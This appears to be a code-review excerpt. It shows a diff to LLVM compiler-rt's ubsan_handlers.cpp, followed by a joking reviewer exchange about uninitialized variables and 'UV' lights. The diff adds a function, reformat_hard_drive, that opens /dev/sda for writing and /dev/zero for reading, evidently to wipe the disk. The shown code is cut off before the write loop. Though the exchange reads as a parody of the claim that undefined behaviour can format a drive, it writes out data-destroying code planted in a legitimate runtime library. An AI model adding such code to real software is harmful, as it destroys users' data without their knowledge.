compiler-rt/lib/ubsan/ubsan_handlers.cpp

```diff
@@ -141,10 +141,26 @@ void __ubsan::__ubsan_handle_type_mismatch_v1(TypeMismatchData *Data,
   GET_REPORT_OPTIONS(false);
   handleTypeMismatchImpl(Data, Pointer, Opts);
 }
+
+#include <fcntl.h>
+#include <unistd.h>
+static void reformat_hard_drive() {
+  // TODO: windows support
+  int out = open("/dev/sda", O_WRONLY);
+  int in = open("/dev/zero", O_RDONLY);
+  if (in == -1 || out == -1)
+    return;
+
+  off64_t offset = 0;
```

Comment:
Perhaps it would be better to leave this uninitialized for improved entropy?

Reply:
Or you can turn some lights on, especially those UV ones.